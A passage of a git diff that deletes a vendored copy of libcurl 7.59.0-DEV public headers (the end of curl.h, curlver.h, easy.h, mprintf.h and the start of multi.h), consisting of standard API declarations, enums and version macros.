- * callback routines with be invoked by this library instead of the system
- * memory management routines like malloc, free etc.
- */
-CURL_EXTERN CURLcode curl_global_init_mem(long flags,
-                                          curl_malloc_callback m,
-                                          curl_free_callback f,
-                                          curl_realloc_callback r,
-                                          curl_strdup_callback s,
-                                          curl_calloc_callback c);
-
-/*
- * NAME curl_global_cleanup()
- *
- * DESCRIPTION
- *
- * curl_global_cleanup() should be invoked exactly once for each application
- * that uses libcurl
- */
-CURL_EXTERN void curl_global_cleanup(void);
-
-/* linked-list structure for the CURLOPT_QUOTE option (and other) */
-struct curl_slist {
-  char *data;
-  struct curl_slist *next;
-};
-
-/*
- * NAME curl_global_sslset()
- *
- * DESCRIPTION
- *
- * When built with multiple SSL backends, curl_global_sslset() allows to
- * choose one. This function can only be called once, and it must be called
- * *before* curl_global_init().
- *
- * The backend can be identified by the id (e.g. CURLSSLBACKEND_OPENSSL). The
- * backend can also be specified via the name parameter (passing -1 as id).
- * If both id and name are specified, the name will be ignored. If neither id
- * nor name are specified, the function will fail with
- * CURLSSLSET_UNKNOWN_BACKEND and set the "avail" pointer to the
- * NULL-terminated list of available backends.
- *
- * Upon success, the function returns CURLSSLSET_OK.
- *
- * If the specified SSL backend is not available, the function returns
- * CURLSSLSET_UNKNOWN_BACKEND and sets the "avail" pointer to a NULL-terminated
- * list of available SSL backends.
- *
- * The SSL backend can be set only once. If it has already been set, a
- * subsequent attempt to change it will result in a CURLSSLSET_TOO_LATE.
- */
-
-typedef struct {
-  curl_sslbackend id;
-  const char *name;
-} curl_ssl_backend;
-
-typedef enum {
-  CURLSSLSET_OK = 0,
-  CURLSSLSET_UNKNOWN_BACKEND,
-  CURLSSLSET_TOO_LATE,
-  CURLSSLSET_NO_BACKENDS /* libcurl was built without any SSL support */
-} CURLsslset;
-
-CURL_EXTERN CURLsslset curl_global_sslset(curl_sslbackend id, const char *name,
-                                          const curl_ssl_backend ***avail);
-
-/*
- * NAME curl_slist_append()
- *
- * DESCRIPTION
- *
- * Appends a string to a linked list. If no list exists, it will be created
- * first. Returns the new list, after appending.
- */
-CURL_EXTERN struct curl_slist *curl_slist_append(struct curl_slist *,
-                                                 const char *);
-
-/*
- * NAME curl_slist_free_all()
- *
- * DESCRIPTION
- *
- * free a previously built curl_slist.
- */
-CURL_EXTERN void curl_slist_free_all(struct curl_slist *);
-
-/*
- * NAME curl_getdate()
- *
- * DESCRIPTION
- *
- * Returns the time, in seconds since 1 Jan 1970 of the time string given in
- * the first argument. The time argument in the second parameter is unused
- * and should be set to NULL.
- */
-CURL_EXTERN time_t curl_getdate(const char *p, const time_t *unused);
-
-/* info about the certificate chain, only for OpenSSL builds. Asked
-   for with CURLOPT_CERTINFO / CURLINFO_CERTINFO */
-struct curl_certinfo {
-  int num_of_certs;             /* number of certificates with information */
-  struct curl_slist **certinfo; /* for each index in this array, there's a
-                                   linked list with textual information in the
-                                   format "name: value" */
-};
-
-/* Information about the SSL library used and the respective internal SSL
-   handle, which can be used to obtain further information regarding the
-   connection. Asked for with CURLINFO_TLS_SSL_PTR or CURLINFO_TLS_SESSION. */
-struct curl_tlssessioninfo {
-  curl_sslbackend backend;
-  void *internals;
-};
-
-#define CURLINFO_STRING   0x100000
-#define CURLINFO_LONG     0x200000
-#define CURLINFO_DOUBLE   0x300000
-#define CURLINFO_SLIST    0x400000
-#define CURLINFO_PTR      0x400000 /* same as SLIST */
-#define CURLINFO_SOCKET   0x500000
-#define CURLINFO_OFF_T    0x600000
-#define CURLINFO_MASK     0x0fffff
-#define CURLINFO_TYPEMASK 0xf00000
-
-typedef enum {
-  CURLINFO_NONE, /* first, never use this */
-  CURLINFO_EFFECTIVE_URL    = CURLINFO_STRING + 1,
-  CURLINFO_RESPONSE_CODE    = CURLINFO_LONG   + 2,
-  CURLINFO_TOTAL_TIME       = CURLINFO_DOUBLE + 3,
-  CURLINFO_NAMELOOKUP_TIME  = CURLINFO_DOUBLE + 4,
-  CURLINFO_CONNECT_TIME     = CURLINFO_DOUBLE + 5,
-  CURLINFO_PRETRANSFER_TIME = CURLINFO_DOUBLE + 6,
-  CURLINFO_SIZE_UPLOAD      = CURLINFO_DOUBLE + 7,
-  CURLINFO_SIZE_UPLOAD_T    = CURLINFO_OFF_T  + 7,
-  CURLINFO_SIZE_DOWNLOAD    = CURLINFO_DOUBLE + 8,
-  CURLINFO_SIZE_DOWNLOAD_T  = CURLINFO_OFF_T  + 8,
-  CURLINFO_SPEED_DOWNLOAD   = CURLINFO_DOUBLE + 9,
-  CURLINFO_SPEED_DOWNLOAD_T = CURLINFO_OFF_T  + 9,
-  CURLINFO_SPEED_UPLOAD     = CURLINFO_DOUBLE + 10,
-  CURLINFO_SPEED_UPLOAD_T   = CURLINFO_OFF_T  + 10,
-  CURLINFO_HEADER_SIZE      = CURLINFO_LONG   + 11,
-  CURLINFO_REQUEST_SIZE     = CURLINFO_LONG   + 12,
-  CURLINFO_SSL_VERIFYRESULT = CURLINFO_LONG   + 13,
-  CURLINFO_FILETIME         = CURLINFO_LONG   + 14,
-  CURLINFO_FILETIME_T       = CURLINFO_OFF_T  + 14,
-  CURLINFO_CONTENT_LENGTH_DOWNLOAD   = CURLINFO_DOUBLE + 15,
-  CURLINFO_CONTENT_LENGTH_DOWNLOAD_T = CURLINFO_OFF_T  + 15,
-  CURLINFO_CONTENT_LENGTH_UPLOAD     = CURLINFO_DOUBLE + 16,
-  CURLINFO_CONTENT_LENGTH_UPLOAD_T   = CURLINFO_OFF_T  + 16,
-  CURLINFO_STARTTRANSFER_TIME = CURLINFO_DOUBLE + 17,
-  CURLINFO_CONTENT_TYPE     = CURLINFO_STRING + 18,
-  CURLINFO_REDIRECT_TIME    = CURLINFO_DOUBLE + 19,
-  CURLINFO_REDIRECT_COUNT   = CURLINFO_LONG   + 20,
-  CURLINFO_PRIVATE          = CURLINFO_STRING + 21,
-  CURLINFO_HTTP_CONNECTCODE = CURLINFO_LONG   + 22,
-  CURLINFO_HTTPAUTH_AVAIL   = CURLINFO_LONG   + 23,
-  CURLINFO_PROXYAUTH_AVAIL  = CURLINFO_LONG   + 24,
-  CURLINFO_OS_ERRNO         = CURLINFO_LONG   + 25,
-  CURLINFO_NUM_CONNECTS     = CURLINFO_LONG   + 26,
-  CURLINFO_SSL_ENGINES      = CURLINFO_SLIST  + 27,
-  CURLINFO_COOKIELIST       = CURLINFO_SLIST  + 28,
-  CURLINFO_LASTSOCKET       = CURLINFO_LONG   + 29,
-  CURLINFO_FTP_ENTRY_PATH   = CURLINFO_STRING + 30,
-  CURLINFO_REDIRECT_URL     = CURLINFO_STRING + 31,
-  CURLINFO_PRIMARY_IP       = CURLINFO_STRING + 32,
-  CURLINFO_APPCONNECT_TIME  = CURLINFO_DOUBLE + 33,
-  CURLINFO_CERTINFO         = CURLINFO_PTR    + 34,
-  CURLINFO_CONDITION_UNMET  = CURLINFO_LONG   + 35,
-  CURLINFO_RTSP_SESSION_ID  = CURLINFO_STRING + 36,
-  CURLINFO_RTSP_CLIENT_CSEQ = CURLINFO_LONG   + 37,
-  CURLINFO_RTSP_SERVER_CSEQ = CURLINFO_LONG   + 38,
-  CURLINFO_RTSP_CSEQ_RECV   = CURLINFO_LONG   + 39,
-  CURLINFO_PRIMARY_PORT     = CURLINFO_LONG   + 40,
-  CURLINFO_LOCAL_IP         = CURLINFO_STRING + 41,
-  CURLINFO_LOCAL_PORT       = CURLINFO_LONG   + 42,
-  CURLINFO_TLS_SESSION      = CURLINFO_PTR    + 43,
-  CURLINFO_ACTIVESOCKET     = CURLINFO_SOCKET + 44,
-  CURLINFO_TLS_SSL_PTR      = CURLINFO_PTR    + 45,
-  CURLINFO_HTTP_VERSION     = CURLINFO_LONG   + 46,
-  CURLINFO_PROXY_SSL_VERIFYRESULT = CURLINFO_LONG + 47,
-  CURLINFO_PROTOCOL         = CURLINFO_LONG   + 48,
-  CURLINFO_SCHEME           = CURLINFO_STRING + 49,
-  /* Fill in new entries below here! */
-
-  CURLINFO_LASTONE          = 49
-} CURLINFO;
-
-/* CURLINFO_RESPONSE_CODE is the new name for the option previously known as
-   CURLINFO_HTTP_CODE */
-#define CURLINFO_HTTP_CODE CURLINFO_RESPONSE_CODE
-
-typedef enum {
-  CURLCLOSEPOLICY_NONE, /* first, never use this */
-
-  CURLCLOSEPOLICY_OLDEST,
-  CURLCLOSEPOLICY_LEAST_RECENTLY_USED,
-  CURLCLOSEPOLICY_LEAST_TRAFFIC,
-  CURLCLOSEPOLICY_SLOWEST,
-  CURLCLOSEPOLICY_CALLBACK,
-
-  CURLCLOSEPOLICY_LAST /* last, never use this */
-} curl_closepolicy;
-
-#define CURL_GLOBAL_SSL (1<<0) /* no purpose since since 7.57.0 */
-#define CURL_GLOBAL_WIN32 (1<<1)
-#define CURL_GLOBAL_ALL (CURL_GLOBAL_SSL|CURL_GLOBAL_WIN32)
-#define CURL_GLOBAL_NOTHING 0
-#define CURL_GLOBAL_DEFAULT CURL_GLOBAL_ALL
-#define CURL_GLOBAL_ACK_EINTR (1<<2)
-
-
-/*****************************************************************************
- * Setup defines, protos etc for the sharing stuff.
- */
-
-/* Different data locks for a single share */
-typedef enum {
-  CURL_LOCK_DATA_NONE = 0,
-  /*  CURL_LOCK_DATA_SHARE is used internally to say that
-   *  the locking is just made to change the internal state of the share
-   *  itself.
-   */
-  CURL_LOCK_DATA_SHARE,
-  CURL_LOCK_DATA_COOKIE,
-  CURL_LOCK_DATA_DNS,
-  CURL_LOCK_DATA_SSL_SESSION,
-  CURL_LOCK_DATA_CONNECT,
-  CURL_LOCK_DATA_LAST
-} curl_lock_data;
-
-/* Different lock access types */
-typedef enum {
-  CURL_LOCK_ACCESS_NONE = 0,   /* unspecified action */
-  CURL_LOCK_ACCESS_SHARED = 1, /* for read perhaps */
-  CURL_LOCK_ACCESS_SINGLE = 2, /* for write perhaps */
-  CURL_LOCK_ACCESS_LAST        /* never use */
-} curl_lock_access;
-
-typedef void (*curl_lock_function)(CURL *handle,
-                                   curl_lock_data data,
-                                   curl_lock_access locktype,
-                                   void *userptr);
-typedef void (*curl_unlock_function)(CURL *handle,
-                                     curl_lock_data data,
-                                     void *userptr);
-
-
-typedef enum {
-  CURLSHE_OK,  /* all is fine */
-  CURLSHE_BAD_OPTION, /* 1 */
-  CURLSHE_IN_USE,     /* 2 */
-  CURLSHE_INVALID,    /* 3 */
-  CURLSHE_NOMEM,      /* 4 out of memory */
-  CURLSHE_NOT_BUILT_IN, /* 5 feature not present in lib */
-  CURLSHE_LAST        /* never use */
-} CURLSHcode;
-
-typedef enum {
-  CURLSHOPT_NONE,  /* don't use */
-  CURLSHOPT_SHARE,   /* specify a data type to share */
-  CURLSHOPT_UNSHARE, /* specify which data type to stop sharing */
-  CURLSHOPT_LOCKFUNC,   /* pass in a 'curl_lock_function' pointer */
-  CURLSHOPT_UNLOCKFUNC, /* pass in a 'curl_unlock_function' pointer */
-  CURLSHOPT_USERDATA,   /* pass in a user data pointer used in the lock/unlock
-                           callback functions */
-  CURLSHOPT_LAST  /* never use */
-} CURLSHoption;
-
-CURL_EXTERN CURLSH *curl_share_init(void);
-CURL_EXTERN CURLSHcode curl_share_setopt(CURLSH *, CURLSHoption option, ...);
-CURL_EXTERN CURLSHcode curl_share_cleanup(CURLSH *);
-
-/****************************************************************************
- * Structures for querying information about the curl library at runtime.
- */
-
-typedef enum {
-  CURLVERSION_FIRST,
-  CURLVERSION_SECOND,
-  CURLVERSION_THIRD,
-  CURLVERSION_FOURTH,
-  CURLVERSION_FIFTH,
-  CURLVERSION_LAST /* never actually use this */
-} CURLversion;
-
-/* The 'CURLVERSION_NOW' is the symbolic name meant to be used by
-   basically all programs ever that want to get version information. It is
-   meant to be a built-in version number for what kind of struct the caller
-   expects. If the struct ever changes, we redefine the NOW to another enum
-   from above. */
-#define CURLVERSION_NOW CURLVERSION_FIFTH
-
-typedef struct {
-  CURLversion age;          /* age of the returned struct */
-  const char *version;      /* LIBCURL_VERSION */
-  unsigned int version_num; /* LIBCURL_VERSION_NUM */
-  const char *host;         /* OS/host/cpu/machine when configured */
-  int features;             /* bitmask, see defines below */
-  const char *ssl_version;  /* human readable string */
-  long ssl_version_num;     /* not used anymore, always 0 */
-  const char *libz_version; /* human readable string */
-  /* protocols is terminated by an entry with a NULL protoname */
-  const char * const *protocols;
-
-  /* The fields below this were added in CURLVERSION_SECOND */
-  const char *ares;
-  int ares_num;
-
-  /* This field was added in CURLVERSION_THIRD */
-  const char *libidn;
-
-  /* These field were added in CURLVERSION_FOURTH */
-
-  /* Same as '_libiconv_version' if built with HAVE_ICONV */
-  int iconv_ver_num;
-
-  const char *libssh_version; /* human readable string */
-
-  /* These fields were added in CURLVERSION_FIFTH */
-
-  unsigned int brotli_ver_num; /* Numeric Brotli version
-                                  (MAJOR << 24) | (MINOR << 12) | PATCH */
-  const char *brotli_version; /* human readable string. */
-
-} curl_version_info_data;
-
-#define CURL_VERSION_IPV6         (1<<0)  /* IPv6-enabled */
-#define CURL_VERSION_KERBEROS4    (1<<1)  /* Kerberos V4 auth is supported
-                                             (deprecated) */
-#define CURL_VERSION_SSL          (1<<2)  /* SSL options are present */
-#define CURL_VERSION_LIBZ         (1<<3)  /* libz features are present */
-#define CURL_VERSION_NTLM         (1<<4)  /* NTLM auth is supported */
-#define CURL_VERSION_GSSNEGOTIATE (1<<5)  /* Negotiate auth is supported
-                                             (deprecated) */
-#define CURL_VERSION_DEBUG        (1<<6)  /* Built with debug capabilities */
-#define CURL_VERSION_ASYNCHDNS    (1<<7)  /* Asynchronous DNS resolves */
-#define CURL_VERSION_SPNEGO       (1<<8)  /* SPNEGO auth is supported */
-#define CURL_VERSION_LARGEFILE    (1<<9)  /* Supports files larger than 2GB */
-#define CURL_VERSION_IDN          (1<<10) /* Internationized Domain Names are
-                                             supported */
-#define CURL_VERSION_SSPI         (1<<11) /* Built against Windows SSPI */
-#define CURL_VERSION_CONV         (1<<12) /* Character conversions supported */
-#define CURL_VERSION_CURLDEBUG    (1<<13) /* Debug memory tracking supported */
-#define CURL_VERSION_TLSAUTH_SRP  (1<<14) /* TLS-SRP auth is supported */
-#define CURL_VERSION_NTLM_WB      (1<<15) /* NTLM delegation to winbind helper
-                                             is supported */
-#define CURL_VERSION_HTTP2        (1<<16) /* HTTP2 support built-in */
-#define CURL_VERSION_GSSAPI       (1<<17) /* Built against a GSS-API library */
-#define CURL_VERSION_KERBEROS5    (1<<18) /* Kerberos V5 auth is supported */
-#define CURL_VERSION_UNIX_SOCKETS (1<<19) /* Unix domain sockets support */
-#define CURL_VERSION_PSL          (1<<20) /* Mozilla's Public Suffix List, used
-                                             for cookie domain verification */
-#define CURL_VERSION_HTTPS_PROXY  (1<<21) /* HTTPS-proxy support built-in */
-#define CURL_VERSION_MULTI_SSL    (1<<22) /* Multiple SSL backends available */
-#define CURL_VERSION_BROTLI       (1<<23) /* Brotli features are present. */
-
- /*
- * NAME curl_version_info()
- *
- * DESCRIPTION
- *
- * This function returns a pointer to a static copy of the version info
- * struct. See above.
- */
-CURL_EXTERN curl_version_info_data *curl_version_info(CURLversion);
-
-/*
- * NAME curl_easy_strerror()
- *
- * DESCRIPTION
- *
- * The curl_easy_strerror function may be used to turn a CURLcode value
- * into the equivalent human readable error string.  This is useful
- * for printing meaningful error messages.
- */
-CURL_EXTERN const char *curl_easy_strerror(CURLcode);
-
-/*
- * NAME curl_share_strerror()
- *
- * DESCRIPTION
- *
- * The curl_share_strerror function may be used to turn a CURLSHcode value
- * into the equivalent human readable error string.  This is useful
- * for printing meaningful error messages.
- */
-CURL_EXTERN const char *curl_share_strerror(CURLSHcode);
-
-/*
- * NAME curl_easy_pause()
- *
- * DESCRIPTION
- *
- * The curl_easy_pause function pauses or unpauses transfers. Select the new
- * state by setting the bitmask, use the convenience defines below.
- *
- */
-CURL_EXTERN CURLcode curl_easy_pause(CURL *handle, int bitmask);
-
-#define CURLPAUSE_RECV      (1<<0)
-#define CURLPAUSE_RECV_CONT (0)
-
-#define CURLPAUSE_SEND      (1<<2)
-#define CURLPAUSE_SEND_CONT (0)
-
-#define CURLPAUSE_ALL       (CURLPAUSE_RECV|CURLPAUSE_SEND)
-#define CURLPAUSE_CONT      (CURLPAUSE_RECV_CONT|CURLPAUSE_SEND_CONT)
-
-#ifdef  __cplusplus
-}
-#endif
-
-/* unfortunately, the easy.h and multi.h include files need options and info
-  stuff before they can be included! */
-#include "easy.h" /* nothing in curl is fun without the easy stuff */
-#include "multi.h"
-
-/* the typechecker doesn't work in C++ (yet) */
-#if defined(__GNUC__) && defined(__GNUC_MINOR__) && \
-    ((__GNUC__ > 4) || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) && \
-    !defined(__cplusplus) && !defined(CURL_DISABLE_TYPECHECK)
-#include "typecheck-gcc.h"
-#else
-#if defined(__STDC__) && (__STDC__ >= 1)
-/* This preprocessor magic that replaces a call with the exact same call is
-   only done to make sure application authors pass exactly three arguments
-   to these functions. */
-#define curl_easy_setopt(handle,opt,param) curl_easy_setopt(handle,opt,param)
-#define curl_easy_getinfo(handle,info,arg) curl_easy_getinfo(handle,info,arg)
-#define curl_share_setopt(share,opt,param) curl_share_setopt(share,opt,param)
-#define curl_multi_setopt(handle,opt,param) curl_multi_setopt(handle,opt,param)
-#endif /* __STDC__ >= 1 */
-#endif /* gcc >= 4.3 && !__cplusplus */
-
-#endif /* __CURL_CURL_H */
diff --git a/thirdparty/curl/include/curl/curlver.h b/thirdparty/curl/include/curl/curlver.h
deleted file mode 100644
index 5149d2f..0000000
--- a/thirdparty/curl/include/curl/curlver.h
+++ /dev/null
@@ -1,77 +0,0 @@
-#ifndef __CURL_CURLVER_H
-#define __CURL_CURLVER_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2018, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/* This header file contains nothing but libcurl version info, generated by
-   a script at release-time. This was made its own header file in 7.11.2 */
-
-/* This is the global package copyright */
-#define LIBCURL_COPYRIGHT "1996 - 2018 Daniel Stenberg, <daniel@haxx.se>."
-
-/* This is the version number of the libcurl package from which this header
-   file origins: */
-#define LIBCURL_VERSION "7.59.0-DEV"
-
-/* The numeric version number is also available "in parts" by using these
-   defines: */
-#define LIBCURL_VERSION_MAJOR 7
-#define LIBCURL_VERSION_MINOR 59
-#define LIBCURL_VERSION_PATCH 0
-
-/* This is the numeric version of the libcurl version number, meant for easier
-   parsing and comparions by programs. The LIBCURL_VERSION_NUM define will
-   always follow this syntax:
-
-         0xXXYYZZ
-
-   Where XX, YY and ZZ are the main version, release and patch numbers in
-   hexadecimal (using 8 bits each). All three numbers are always represented
-   using two digits.  1.2 would appear as "0x010200" while version 9.11.7
-   appears as "0x090b07".
-
-   This 6-digit (24 bits) hexadecimal number does not show pre-release number,
-   and it is always a greater number in a more recent release. It makes
-   comparisons with greater than and less than work.
-
-   Note: This define is the full hex number and _does not_ use the
-   CURL_VERSION_BITS() macro since curl's own configure script greps for it
-   and needs it to contain the full number.
-*/
-#define LIBCURL_VERSION_NUM 0x073B00
-
-/*
- * This is the date and time when the full source package was created. The
- * timestamp is not stored in git, as the timestamp is properly set in the
- * tarballs by the maketgz script.
- *
- * The format of the date follows this template:
- *
- * "2007-11-23"
- */
-#define LIBCURL_TIMESTAMP "[unreleased]"
-
-#define CURL_VERSION_BITS(x,y,z) ((x)<<16|(y)<<8|z)
-#define CURL_AT_LEAST_VERSION(x,y,z) \
-  (LIBCURL_VERSION_NUM >= CURL_VERSION_BITS(x, y, z))
-
-#endif /* __CURL_CURLVER_H */
diff --git a/thirdparty/curl/include/curl/easy.h b/thirdparty/curl/include/curl/easy.h
deleted file mode 100644
index 752c504..0000000
--- a/thirdparty/curl/include/curl/easy.h
+++ /dev/null
@@ -1,102 +0,0 @@
-#ifndef __CURL_EASY_H
-#define __CURL_EASY_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-CURL_EXTERN CURL *curl_easy_init(void);
-CURL_EXTERN CURLcode curl_easy_setopt(CURL *curl, CURLoption option, ...);
-CURL_EXTERN CURLcode curl_easy_perform(CURL *curl);
-CURL_EXTERN void curl_easy_cleanup(CURL *curl);
-
-/*
- * NAME curl_easy_getinfo()
- *
- * DESCRIPTION
- *
- * Request internal information from the curl session with this function.  The
- * third argument MUST be a pointer to a long, a pointer to a char * or a
- * pointer to a double (as the documentation describes elsewhere).  The data
- * pointed to will be filled in accordingly and can be relied upon only if the
- * function returns CURLE_OK.  This function is intended to get used *AFTER* a
- * performed transfer, all results from this function are undefined until the
- * transfer is completed.
- */
-CURL_EXTERN CURLcode curl_easy_getinfo(CURL *curl, CURLINFO info, ...);
-
-
-/*
- * NAME curl_easy_duphandle()
- *
- * DESCRIPTION
- *
- * Creates a new curl session handle with the same options set for the handle
- * passed in. Duplicating a handle could only be a matter of cloning data and
- * options, internal state info and things like persistent connections cannot
- * be transferred. It is useful in multithreaded applications when you can run
- * curl_easy_duphandle() for each new thread to avoid a series of identical
- * curl_easy_setopt() invokes in every thread.
- */
-CURL_EXTERN CURL *curl_easy_duphandle(CURL *curl);
-
-/*
- * NAME curl_easy_reset()
- *
- * DESCRIPTION
- *
- * Re-initializes a CURL handle to the default values. This puts back the
- * handle to the same state as it was in when it was just created.
- *
- * It does keep: live connections, the Session ID cache, the DNS cache and the
- * cookies.
- */
-CURL_EXTERN void curl_easy_reset(CURL *curl);
-
-/*
- * NAME curl_easy_recv()
- *
- * DESCRIPTION
- *
- * Receives data from the connected socket. Use after successful
- * curl_easy_perform() with CURLOPT_CONNECT_ONLY option.
- */
-CURL_EXTERN CURLcode curl_easy_recv(CURL *curl, void *buffer, size_t buflen,
-                                    size_t *n);
-
-/*
- * NAME curl_easy_send()
- *
- * DESCRIPTION
- *
- * Sends data over the connected socket. Use after successful
- * curl_easy_perform() with CURLOPT_CONNECT_ONLY option.
- */
-CURL_EXTERN CURLcode curl_easy_send(CURL *curl, const void *buffer,
-                                    size_t buflen, size_t *n);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/curl/include/curl/mprintf.h b/thirdparty/curl/include/curl/mprintf.h
deleted file mode 100644
index e20f546..0000000
--- a/thirdparty/curl/include/curl/mprintf.h
+++ /dev/null
@@ -1,50 +0,0 @@
-#ifndef __CURL_MPRINTF_H
-#define __CURL_MPRINTF_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2016, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-#include <stdarg.h>
-#include <stdio.h> /* needed for FILE */
-#include "curl.h"  /* for CURL_EXTERN */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-CURL_EXTERN int curl_mprintf(const char *format, ...);
-CURL_EXTERN int curl_mfprintf(FILE *fd, const char *format, ...);
-CURL_EXTERN int curl_msprintf(char *buffer, const char *format, ...);
-CURL_EXTERN int curl_msnprintf(char *buffer, size_t maxlength,
-                               const char *format, ...);
-CURL_EXTERN int curl_mvprintf(const char *format, va_list args);
-CURL_EXTERN int curl_mvfprintf(FILE *fd, const char *format, va_list args);
-CURL_EXTERN int curl_mvsprintf(char *buffer, const char *format, va_list args);
-CURL_EXTERN int curl_mvsnprintf(char *buffer, size_t maxlength,
-                                const char *format, va_list args);
-CURL_EXTERN char *curl_maprintf(const char *format, ...);
-CURL_EXTERN char *curl_mvaprintf(const char *format, va_list args);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* __CURL_MPRINTF_H */
diff --git a/thirdparty/curl/include/curl/multi.h b/thirdparty/curl/include/curl/multi.h
deleted file mode 100644
index b19dbaf..0000000
--- a/thirdparty/curl/include/curl/multi.h
+++ /dev/null
@@ -1,441 +0,0 @@
-#ifndef __CURL_MULTI_H
-#define __CURL_MULTI_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-/*
-  This is an "external" header file. Don't give away any internals here!
-
-  GOALS
-
-  o Enable a "pull" interface. The application that uses libcurl decides where
-    and when to ask libcurl to get/send data.
-
-  o Enable multiple simultaneous transfers in the same thread without making it
-    complicated for the application.
-
-  o Enable the application to select() on its own file descriptors and curl's
-    file descriptors simultaneous easily.
-
-*/
-
-/*
- * This header file should not really need to include "curl.h" since curl.h
- * itself includes this file and we expect user applications to do #include
- * <curl/curl.h> without the need for especially including multi.h.
- *
- * For some reason we added this include here at one point, and rather than to
- * break existing (wrongly written) libcurl applications, we leave it as-is
- * but with this warning attached.
- */
-#include "curl.h"
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(BUILDING_LIBCURL) || defined(CURL_STRICTER)
-typedef struct Curl_multi CURLM;
-#else
-typedef void CURLM;
-#endif
-
-typedef enum {
-  CURLM_CALL_MULTI_PERFORM = -1, /* please call curl_multi_perform() or
-                                    curl_multi_socket*() soon */
-  CURLM_OK,
-  CURLM_BAD_HANDLE,      /* the passed-in handle is not a valid CURLM handle */
-  CURLM_BAD_EASY_HANDLE, /* an easy handle was not good/valid */
-  CURLM_OUT_OF_MEMORY,   /* if you ever get this, you're in deep sh*t */
-  CURLM_INTERNAL_ERROR,  /* this is a libcurl bug */
-  CURLM_BAD_SOCKET,      /* the passed in socket argument did not match */
-  CURLM_UNKNOWN_OPTION,  /* curl_multi_setopt() with unsupported option */
-  CURLM_ADDED_ALREADY,   /* an easy handle already added to a multi handle was
-                            attempted to get added - again */
-  CURLM_RECURSIVE_API_CALL, /* an api function was called from inside a
-                               callback */
-  CURLM_LAST
-} CURLMcode;
-
-/* just to make code nicer when using curl_multi_socket() you can now check
-   for CURLM_CALL_MULTI_SOCKET too in the same style it works for
-   curl_multi_perform() and CURLM_CALL_MULTI_PERFORM */
-#define CURLM_CALL_MULTI_SOCKET CURLM_CALL_MULTI_PERFORM
-
-/* bitmask bits for CURLMOPT_PIPELINING */
-#define CURLPIPE_NOTHING   0L
-#define CURLPIPE_HTTP1     1L
-#define CURLPIPE_MULTIPLEX 2L
-
-typedef enum {
-  CURLMSG_NONE, /* first, not used */
-  CURLMSG_DONE, /* This easy handle has completed. 'result' contains
-                   the CURLcode of the transfer */
-  CURLMSG_LAST /* last, not used */
-} CURLMSG;
-
-struct CURLMsg {
-  CURLMSG msg;       /* what this message means */
-  CURL *easy_handle; /* the handle it concerns */
-  union {
-    void *whatever;    /* message-specific data */
-    CURLcode result;   /* return code for transfer */
-  } data;
-};
-typedef struct CURLMsg CURLMsg;
-
-/* Based on poll(2) structure and values.
- * We don't use pollfd and POLL* constants explicitly
- * to cover platforms without poll(). */
-#define CURL_WAIT_POLLIN    0x0001
-#define CURL_WAIT_POLLPRI   0x0002
-#define CURL_WAIT_POLLOUT   0x0004
-
-struct curl_waitfd {
-  curl_socket_t fd;
-  short events;
-  short revents; /* not supported yet */
-};
-
-/*
- * Name:    curl_multi_init()
- *
- * Desc:    inititalize multi-style curl usage
- *
- * Returns: a new CURLM handle to use in all 'curl_multi' functions.
- */
-CURL_EXTERN CURLM *curl_multi_init(void);
-
-/*
- * Name:    curl_multi_add_handle()
- *
- * Desc:    add a standard curl handle to the multi stack
- *
- * Returns: CURLMcode type, general multi error code.
- */
